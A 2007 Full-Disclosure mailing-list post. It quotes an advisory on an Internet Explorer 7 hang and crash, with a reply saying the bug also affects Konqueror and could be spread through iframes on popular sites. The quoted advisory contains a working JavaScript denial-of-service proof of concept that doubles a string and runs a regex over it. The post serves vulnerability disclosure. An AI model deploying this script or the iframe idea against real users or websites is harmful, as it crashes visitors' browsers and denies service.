This also works under Konqueror. There should be an implimentation on ALL browsers that a loop such large is unacceptable and refuse to even run it. There is no viable reason for a client-side to run a loop through so many itterations.
This DoS technique could be abused and iframes with the code could be embedded within popular websites, effectively causing a denial of service to that specific site. On Tuesday 17 April 2007 13:09, J. Oquendo wrote: > Product: Internet Explorer Version 7.0.5730.11 > Impact: Browser crash possibly more > Author: Jesus Oquendo > echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' > > > I. BACKGROUND > Why bother? Who doesn't know what Internet Explorer and Microsoft are. > > II. DESCRIPTION > IE 7 is vulnerable to a script which causes the browser to hang. The > memory and CPU usage go through the roof. Originally the script caused > (and still causes) Safari and Konqueror to crash. > > III SOLUTION > Stop using Microsoft products or deal with a new advisory every other > day. > > IV. Proof > http://www.infiltrated.net/stupidInternetExploder.html > > V. Code > > $ more /stupidInternetExploder.html > > <script> > > var reg = /(.)*/; > > var z = 'Z'; > while (z.length <= > 999999999999999999999999999999999999999999999999999999999999999999999999999 >999999999999999999999999999999999999999999999999 > 999999999999999999999999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999999999999 >9999999 > 999999999999999999999999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999999999999 >9999999 > 999999999999999999999999999999999999999999999999999999999999999999999999999 >9999999999999999999999999999999999999999999999999999999999999999999999999999 >9999999 > 999999999999999999999999999999999999999999999999999999999999999999999999999 >999999999999999) z+=z; var boum = reg.exec(z); > > </script> > > Goodbye > > > J. Oquendo > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 > sil . infiltrated @ net http://www.infiltrated.net > > The happiness of society is the end of government. > John Adams _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
